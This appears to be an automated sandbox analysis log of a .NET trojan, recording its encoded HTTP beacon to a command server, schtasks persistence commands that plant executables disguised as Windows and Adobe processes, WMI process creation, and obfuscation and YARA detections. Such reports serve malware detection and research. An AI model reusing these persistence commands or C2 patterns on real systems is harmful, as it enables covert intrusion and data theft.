      Source: global trafficHTTP traffic detected: GET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 194.190.152.128Connection: Keep-Alive
      Source: w9d568i4Ia.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: 00000006.00000002.545115901.00000000129B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: 00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: 00000006.00000002.545094899.0000000012995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: Process Memory Space: w9d568i4Ia.exe PID: 3240, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: Process Memory Space: vLhkFRJoasJvKPEeUEtn.exe PID: 5692, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeCode function: 6_2_00007FFBACF7CCF16_2_00007FFBACF7CCF1
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeCode function: 6_2_00007FFBACF7BF416_2_00007FFBACF7BF41
      Source: w9d568i4Ia.exe, 00000000.00000003.351864371.000000001BDE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.301959659.000000001BDBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.354559462.0000000000E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBuildInstallationTweaksPlugin.dll\ vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.287159456.000000001BDB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.281369879.000000001BBCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.351626273.000000001BC45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSu6wtgvQo6.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1dX3I0PLFfoAqVkP.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSu6wtgvQo6.exe vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSu6wtgvQo6.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameg0.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRRdahoXGrxfBCFA.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.358415663.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameqJAl8Lq.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.355907041.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBuildInstallationTweaksPlugin.dll\ vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.349331635.000000001BDC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000000.260850551.0000000000838000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.349501951.000000001BC63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.349501951.000000001BC63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000003.349545181.000000001BC14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSu6wtgvQo6.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000000.00000002.352659498.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exe, 00000023.00000002.425205369.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exeBinary or memory string: OriginalFilenameT5YDweZz0hvRIzX47c9Z1q.exeD vs w9d568i4Ia.exe
      Source: w9d568i4Ia.exeReversingLabs: Detection: 84%
      Source: w9d568i4Ia.exeVirustotal: Detection: 71%
      Source: w9d568i4Ia.exeMetadefender: Detection: 61%
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile read: C:\Users\user\Desktop\w9d568i4Ia.exeJump to behavior
      Source: w9d568i4Ia.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\w9d568i4Ia.exe "C:\Users\user\Desktop\w9d568i4Ia.exe"
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 5 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /f
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtn" /sc ONLOGON /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 11 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /f
      Source: unknownProcess created: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /f
      Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /f
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /rl HIGHEST /f
      Source: unknownProcess created: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
      Source: unknownProcess created: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\w9d568i4Ia.exe "C:\Users\user\Desktop\w9d568i4Ia.exe"
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\w9d568i4Ia.exe "C:\Users\user\Desktop\w9d568i4Ia.exe"
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\AppData\Local\Temp\Fssxa4WCX6Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@28/33@0/1
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: w9d568i4Ia.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeMutant created: \Sessions\1\BaseNamedObjects\Local\29bacd35ab79d28b5f78dd4f42d12fc04fc48514
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exeJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat"
      Source: w9d568i4Ia.exe, zVK2U0wJgPNlE2UPfn8/FjfmTcwQuUTf4GsHdkM.csCryptographic APIs: 'CreateDecryptor'
      Source: w9d568i4Ia.exe, zVK2U0wJgPNlE2UPfn8/FjfmTcwQuUTf4GsHdkM.csCryptographic APIs: 'CreateDecryptor'
      Source: w9d568i4Ia.exe, H0MHraZrWEMdB7Tj5Sk/zDWAHwZyOpVepMpvTKf.csCryptographic APIs: 'TransformBlock'
      Source: w9d568i4Ia.exe, H0MHraZrWEMdB7Tj5Sk/zDWAHwZyOpVepMpvTKf.csCryptographic APIs: 'TransformFinalBlock'
      Source: w9d568i4Ia.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: w9d568i4Ia.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: w9d568i4Ia.exe, MHog7Ce3JvI3cqN8poP/e7TNbQeB7rG7YJNL7OV.cs.Net Code: dH6NJb07QN System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: w9d568i4Ia.exe, MHog7Ce3JvI3cqN8poP/e7TNbQeB7rG7YJNL7OV.cs.Net Code: dH6NJb07QN System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      .NET source code contains method to dynamically call methods (often used by packers)
      Source: w9d568i4Ia.exe, zVK2U0wJgPNlE2UPfn8/FjfmTcwQuUTf4GsHdkM.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
      Source: w9d568i4Ia.exe, mqdeJEpZebQXGtCMUZy/zNQZgjpUrQSmV1tcIoS.csHigh entropy of concatenated method names: '.ctor', 'xDv3YW2y6t', 'NII3EMnyvs', 'X8p3AOJgyc', 'tAK3OV6Vy7', 'UWb3Ldht12', 'WVc3TkJTx3', 'Ttr3syAAUD', 'kQP3a4vHwJ', 'tUJ3bDcAT6'
      Source: w9d568i4Ia.exe, MWLyeBeNTZwWBERbtTp/I3mxCleesNJ5cIe0Dxe.csHigh entropy of concatenated method names: '36A', 'ZO2', '.cctor', 'SmXeT7UVZ1', 'osmesUawSI', 'rq4eaGdPhD', 'XiZebhTKvh', 'Ykse2OD4VB', 'pwMevst9S0', 'jJXeHyxsaR'
      Source: w9d568i4Ia.exe, MKsDh2sAh37nHwxpE5/H2yOoeTV0UknHkH3cl.csHigh entropy of concatenated method names: '9Qy', 'M4k', '.ctor', 'XURUuZuiXIJgLfE4v0A', 'GPgsE7uD88j351V717T', 'wG6CnMuz2iFrindpqbv', 'Bw7X0wXcfj1YLXwiQHc', 'EF78IYXj4gwRRydHbJ6', 'I48avlXumqg32AOQlYN', 'XaTL8vXXQgsVNMRxCLr'
      Source: w9d568i4Ia.exe, thFndllYuJRZ859n0P/us8leVfMpVo6XZstuM.csHigh entropy of concatenated method names: '.ctor', '#C', '#D', '#E', '#F', '#G', 'y1E', 'Add', '#I', '#J'
      Source: w9d568i4Ia.exe, z31PZ0NQL3rKYKGU3K7/BbXdydN8Pu8RQ2Mm08S.csHigh entropy of concatenated method names: '.cctor', '8o8', 'jadHHEaJCDd94cp6528', 'Ggn3nfaWjfRVJ6jhTCb', 'zRnvQfat0Vi0wG8Qk5w', 'eQQVhEaKF2lmSRZQGy3', 'kR7vTfaFTyxAFyIY5Ug', 'PAVeQ0aV2J3NXhqdUdd', 'NHEuJYaoj5bITE7hcRo', 'nMMQXiakBaD1ahDV0Y2'
      Source: w9d568i4Ia.exe, mtCjGGKRoN6fqGAyGO/xkdb6MkV3tvB8q7X9t.csHigh entropy of concatenated method names: 'P1z', '5Ch', '.ctor', 'VLpu8HBxYLiE0kyGYQI', 'EPBAp9B9cG7fekZysIT', 'E8reCKBr5IXUePMV2bQ', 'pC7xduBeSZQG7tqBro0', 'wHgb9NB8aAZ1FZv24YI', 'MFIVP5B0rAobUFtMPmL', 'HOEewaByLiZAnV3Ecxj'
      Source: w9d568i4Ia.exe, Axq17exvVHYCuwliPE/YGweuDF6qHiimbEE6U.csHigh entropy of concatenated method names: '695', '472', '.ctor', 'b7Flr1BhyUKTHAkaV2A', 'U5aUgvBd1TWde7uMQ4j', 'upOhWbBYPSFyq5Jm3i0', 'iJCj94BThm1sKE8sLn9', 'XOB9EYBb0xPXjP66gPW', 'JTrNNjBUNX9edSRTp1g', 'eL9cZWBZGqk7s7BHdIl'
      Source: w9d568i4Ia.exe, qWQDXtDF96yXZVHouu/nWSw2FhfYaTIKUACUx.csHigh entropy of concatenated method names: 'a2n', 'Xk2', '.ctor', 'JbwJhyM68wFVA7uWAyO', 'xVKVtkMlaNk6aum9C9h', 'XbN8I2MGX0aIBdW95QF', 'UQJJP3MOSXAXXx7ATmX', 'gT64A1MgDRQK0tguTrR', 'qsdo31MQmJxxuLxk4gt', 'nUJfCoMmK402gsTE1wI'
      Source: w9d568i4Ia.exe, PMWsAt6TvynsBsohOq/YjSDe80FCwGgK8yMEY.csHigh entropy of concatenated method names: 'sd4', '2zX', '.ctor', 't6yfcUMeNiG05lA9qxv', 'KYiJhxM8xVUDXT1jKE7', 'dewdxVM0NLic8NvB8nv', 'xA5bGjMyhXcd4e2HGgk', 'Yob9qMMa96luhWYFCfI', 'MJZIQyMJAdKVSAcCg3U', 'NV6ngAMWGSGfNaQ8sLx'
      Source: w9d568i4Ia.exe, kgewVS1r7g7Pj6JKZj/BQBjlDHtnbAw3oa5vD.csHigh entropy of concatenated method names: 'iW5', '5CE', '.ctor', 'b8YWqOMUUCT19GV4s3Z', 'etOcAdMZ6Jf1xhN7m8w', 'fkk8KVMPo5SmULDWgIu', 'KWatPfMCUxBxI3CZZf1', 'A7pJZkMvcOfdAkg1EfQ', 'L0QKL4Mxvppx43CCe1l', 'og43PVMTwgMQ8u4ccoB'
      Source: w9d568i4Ia.exe, jqEX8VvIZRIrjmYXdW/F7skIf2WQli7eOVXuk.csHigh entropy of concatenated method names: '8k1', 'B73', '.ctor', 'NqXiWfXwoM7f3ExH2DD', 'xMRTNkX3GaaEpJaw8ua', 'W9VKkgXiQRn6fPHf0Kc', 'h6IuXWXDr3vUP6WXfQQ', 'IYQohrXzbMdh2LjYhDh', 'sDwQ5hMcfEIgttpPV44', 'zJAHJOMjXlj0OPrujIc'
      Source: w9d568i4Ia.exe, pM9EmbbMIIlZsPtVVb/RDVg7LaOMspPQSr4Vh.csHigh entropy of concatenated method names: 'a4d', 'Lq4', '.ctor', 'clYMDmXAnTcL5nLviFX', 'ROQYQcXntxEsinPA92d', 'NRlcbgXfFrRQ0DwYbav', 'VTb41WX7mumy33ON5Qn', 'GEt2klX45doSuHvY2tU', 'oosNf8X2An8UgA3VtYT', 'XEDvH3X1VXcFkTjR0Jl'
